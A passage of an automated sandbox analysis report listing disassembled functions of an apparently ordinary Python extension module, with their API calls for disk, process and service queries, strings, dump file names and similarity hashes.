strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

(ssss), xrefs: 00007FFB9DD63250
cdrom, xrefs: 00007FFB9DD631EA

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$cdrom
API String ID: 1595588724-3732572278
Opcode ID: 57ecbf51a61788dfee4cb626ccb9ca1eebc7545966e79e12385e4591728c9a23
Instruction ID: 63af5e4a43d90bab62e40d961b5e7f1a989420945469dc706a70dae947c4108c
Opcode Fuzzy Hash: 57ecbf51a61788dfee4cb626ccb9ca1eebc7545966e79e12385e4591728c9a23
Instruction Fuzzy Hash: CF114FA1B09A8685EA30DF72E8046B963A4FF4CB58FC85035C98E46755FE3CE149C380

Function 00007FFB9DD631F3 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strcat_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD63233
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63257
PyList_Append.PYTHON3 ref: 00007FFB9DD6326B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6327E
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

(ssss), xrefs: 00007FFB9DD63250
removable, xrefs: 00007FFB9DD631F3

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$ErrorMode$AppendBuildList_Valuestrcat_sstrchr
String ID: (ssss)$removable
API String ID: 1595588724-4184024711
Opcode ID: 3371c800e02b6f27b4f0bc8ae7f63ab1221f932767a5d01b5a4ee71868bc7488
Instruction ID: 2774af7cd6bf7aa21892c8cf5a83384e547fdff2cebbd772684082859819c0d2
Opcode Fuzzy Hash: 3371c800e02b6f27b4f0bc8ae7f63ab1221f932767a5d01b5a4ee71868bc7488
Instruction Fuzzy Hash: C5114FA1B09A8685EA30DF72E8046B963A0FF4DB58FC85035C98E46755FE3CE149C380

Function 00007FFB9DD63318 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD6336C
memset.VCRUNTIME140 ref: 00007FFB9DD63398
QueryDosDeviceA.KERNEL32 ref: 00007FFB9DD633AD
Py_BuildValue.PYTHON3 ref: 00007FFB9DD633F0
swprintf_s.MSPDB140-MSVCRT ref: 00007FFB9DD63424

Part of subcall function 00007FFB9DD629D0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62A0F

Strings

%c:, xrefs: 00007FFB9DD63413
:, xrefs: 00007FFB9DD6338C

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Arg_BuildDeviceParseQueryTupleValue__stdio_common_vsprintf_smemsetswprintf_s
String ID: %c:$:
API String ID: 784832287-4169684950
Opcode ID: c36e93091ea0fa53515c8ffaf2328a1cc7e56425024552580debbe531ed2ddde
Instruction ID: fa12050ad617cc3ca7d55332a89b9d37e4cd237841f8f0495bb830b6fbe3508f
Opcode Fuzzy Hash: c36e93091ea0fa53515c8ffaf2328a1cc7e56425024552580debbe531ed2ddde
Instruction Fuzzy Hash: B6319AA171C68746E7718F76D8512BA3BA0EF89744FC86036D6CD82665FF2CE509C740

Function 00007FFB9DD68BB0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56servicethreadCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD68BD2
PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD68C1C
ControlService.ADVAPI32 ref: 00007FFB9DD68C32
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD68C3D
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD68C60

Strings

ControlService, xrefs: 00007FFB9DD68C51

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Eval_ServiceThread$Arg_CloseControlHandleParseRestoreSaveTuple
String ID: ControlService
API String ID: 1908151670-253159669
Opcode ID: 17f90c403e5eb0df82662931804360693879771c4f93eb81ea2b7320ae8cb868
Instruction ID: 3237a6ef9857da36368ecc0ba067a07c6db1889d975481cb45a443a9a23cc9df
Opcode Fuzzy Hash: 17f90c403e5eb0df82662931804360693879771c4f93eb81ea2b7320ae8cb868
Instruction Fuzzy Hash: E321DFA1B4CA4682EB209B37E85117963A1FF8DB94FC52035D98D43B65FF3DE1468780

Function 00007FFB9DD65F1E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)
API String ID: 1097362947-341566991
Opcode ID: bb93f2e791c74b06c503ff55e854b4f2b4c8aa95054248553b7d0ff19736460e
Instruction ID: fe6c43bab3633aeed2e53574930bf61096f8338369f0df41fd722fa17fa95ca4
Opcode Fuzzy Hash: bb93f2e791c74b06c503ff55e854b4f2b4c8aa95054248553b7d0ff19736460e
Instruction Fuzzy Hash: 01111FB1B0DA8285EA708F33E4582796360BFADB95F842032DD8E57754FE3CE0458380

Function 00007FFB9DD65F27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)
API String ID: 1097362947-341566991
Opcode ID: 36eb1ef3898e88aaec895ac89283d0571a7033b47906345bfeb9f72e29fbe982
Instruction ID: 00c776b2e4212f0a7f4cbbcedaebc24c86d460fecce02b7392578f256e3d5fe1
Opcode Fuzzy Hash: 36eb1ef3898e88aaec895ac89283d0571a7033b47906345bfeb9f72e29fbe982
Instruction Fuzzy Hash: AE111FB1B0DA8285EA748F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380

Function 00007FFB9DD65F30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)
API String ID: 1097362947-341566991
Opcode ID: 208d4ccfd0bd7aa230a2353d25ce14191a6dd2761953c8efdb017f03263fe47b
Instruction ID: f3afdaeb0a1396d9356361bc657f78e14aa0c692db6d6a688926c3b79a17312d
Opcode Fuzzy Hash: 208d4ccfd0bd7aa230a2353d25ce14191a6dd2761953c8efdb017f03263fe47b
Instruction Fuzzy Hash: 8B111FB1B0DA8285EA709F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380

Function 00007FFB9DD65F03 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)
API String ID: 1097362947-341566991
Opcode ID: 68c1128f8217c209b438140e0ab80c0cf34bd897a476936f67651079a2b26aaf
Instruction ID: 10ac3c1a11c6fabdf0bede0755d9e9a56615cbc6540a78301347829abc3aacbb
Opcode Fuzzy Hash: 68c1128f8217c209b438140e0ab80c0cf34bd897a476936f67651079a2b26aaf
Instruction Fuzzy Hash: 50110DA1B09A8285EA708F33E4582796360BF6DB94F842032DD8E57754FE3CE0458380

Function 00007FFB9DD65F0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)
API String ID: 1097362947-341566991
Opcode ID: 5fd2dceecc98a189c04317e2f72177223008d843a55c624df68859818461c526
Instruction ID: 04d029d1b56ee2ee1a4e9a167d3fb6ac6d42af84d73043e29914b762f3470924
Opcode Fuzzy Hash: 5fd2dceecc98a189c04317e2f72177223008d843a55c624df68859818461c526
Instruction Fuzzy Hash: 7C111FB1B0DA8685EA708F33E4582796360BF6DB95F842032DD8E57754FE3CE0458380

Function 00007FFB9DD65F15 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD65F69
PyList_Append.PYTHON3 ref: 00007FFB9DD65F7D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65F96
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FA5
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandle$AppendBuildList_QueryValueVirtual
String ID: (KsOI)
API String ID: 1097362947-341566991
Opcode ID: c1540cd3b0634550bd1122f653fd40982ffb95a102a837543736d3d91fdcfc01
Instruction ID: 8f30f926aa1e04e9909ee6136cf7fe02786d5553b9ff774a76d6be2abc07322d
Opcode Fuzzy Hash: c1540cd3b0634550bd1122f653fd40982ffb95a102a837543736d3d91fdcfc01
Instruction Fuzzy Hash: 44111CB1B0DA8685EA708F33E4582796360BFADB94F842032DE8E57754FE3CE0458380

Function 00007FFB9DD64170 Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD64178
PyLong_FromLong.PYTHON3 ref: 00007FFB9DD641C4
PyList_Append.PYTHON3 ref: 00007FFB9DD641D8
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD641F1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD64200

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: List_$AppendDeallocFromLongLong_free
String ID:
API String ID: 762243878-0
Opcode ID: 66ddbc0329e381d51be71da3152d1fc3f90bb8ef96ba1be280b286ebe349667c
Instruction ID: af441528ca875c366ca0a826683c5841bff6cbd886bc8d46d0347ee882c4af2f
Opcode Fuzzy Hash: 66ddbc0329e381d51be71da3152d1fc3f90bb8ef96ba1be280b286ebe349667c
Instruction Fuzzy Hash: 3F215AB6B0DB4282EA719F76F41417A63A0BF9DB84B992435CA8D07754FE3CE4418780

Function 00007FFB9DD650F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD65109
OpenProcess.KERNEL32 ref: 00007FFB9DD65133
GetLastError.KERNEL32 ref: 00007FFB9DD65141
CloseHandle.KERNEL32 ref: 00007FFB9DD65189

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD6511B
OpenProcess, xrefs: 00007FFB9DD6514C

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Arg_CallCloseDeallocErr_ErrorFunctionHandleLastObjectObject_OpenParseProcessTuple
String ID: OpenProcess$automatically set for PID 0
API String ID: 3428877611-2746090705
Opcode ID: 9365e794f7a2c9466c73e0e7a61611867a25e8db539fa53f5ab61896464e3a1e
Instruction ID: c1194226710a802df5a6c9af55f1edaf1fc60da5cea14c7f6fa28bf06fb46d5a
Opcode Fuzzy Hash: 9365e794f7a2c9466c73e0e7a61611867a25e8db539fa53f5ab61896464e3a1e
Instruction Fuzzy Hash: 1411A390B1DA4642EA309B77E8841796391AF5D780FC96035DA9E477A5FE2CE8848380

Function 00007FFB9DD640D0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD640E5
OpenProcess.KERNEL32 ref: 00007FFB9DD64101
CloseHandle.KERNEL32 ref: 00007FFB9DD6411E
PyBool_FromLong.PYTHON3 ref: 00007FFB9DD6412B
CloseHandle.KERNEL32 ref: 00007FFB9DD64139
PyErr_Clear.PYTHON3 ref: 00007FFB9DD6413F
PyBool_FromLong.PYTHON3 ref: 00007FFB9DD64153

Part of subcall function 00007FFB9DD67A40: GetLastError.KERNEL32(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67A5D

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Bool_CloseFromHandleLong$Arg_ClearErr_ErrorLastOpenParseProcessTuple
String ID:
API String ID: 4107186332-0
Opcode ID: 51db0d12a93dc2e0f30fe020c095412b55ea7dfc7f52a68a1eb8d6e0cc7b2091
Instruction ID: 981b9b6bcea31e758ed54c5d6a11bcd60f53f31f73047784c4d637ea58edd341
Opcode Fuzzy Hash: 51db0d12a93dc2e0f30fe020c095412b55ea7dfc7f52a68a1eb8d6e0cc7b2091
Instruction Fuzzy Hash: 9B0140A0F0CA0242FF385B73E8542751292AF5C741F896038D5AE473D1FE3CA8958380

Function 00007FFB9DD64260 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD64275
TerminateProcess.KERNEL32 ref: 00007FFB9DD642B3
GetLastError.KERNEL32 ref: 00007FFB9DD642BD
CloseHandle.KERNEL32 ref: 00007FFB9DD642DF

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD64287
TerminateProcess, xrefs: 00007FFB9DD642C8

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Arg_CallCloseDeallocErr_ErrorFunctionHandleLastObjectObject_ParseProcessTerminateTuple
String ID: TerminateProcess$automatically set for PID 0
API String ID: 4064933840-3562140098
Opcode ID: 96ee3a5b78319e1308ff1afb7144d4f9c45ee2194ece06c57e7b2fc60d094773
Instruction ID: 0842879b5ef9e4047e200475a8de85243fc888ac64aee8dbfa01a56da1f91f40
Opcode Fuzzy Hash: 96ee3a5b78319e1308ff1afb7144d4f9c45ee2194ece06c57e7b2fc60d094773
Instruction Fuzzy Hash: 2B01EDE0F0D90782FB359BB7E8505B92361AF5DB41FD56035C58D866A1FE2CE895C380

Function 00007FFB9DD688DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 22memoryserviceCOMMON

Download Yara Rule

APIs

Py_BuildValue.PYTHON3 ref: 00007FFB9DD688F9
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6890A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68910
HeapFree.KERNEL32 ref: 00007FFB9DD6891E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6892C
GetProcessHeap.KERNEL32 ref: 00007FFB9DD68932
HeapFree.KERNEL32 ref: 00007FFB9DD68940

Strings

stopped, xrefs: 00007FFB9DD688DE
(sk), xrefs: 00007FFB9DD688F2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$CloseFreeHandleProcessService$BuildValue
String ID: (sk)$stopped
API String ID: 127882022-1133211610
Opcode ID: 5db063c69b56fa29c44e9e9f56adae1de52bf740f7b2cf0a61671514e64b58fa
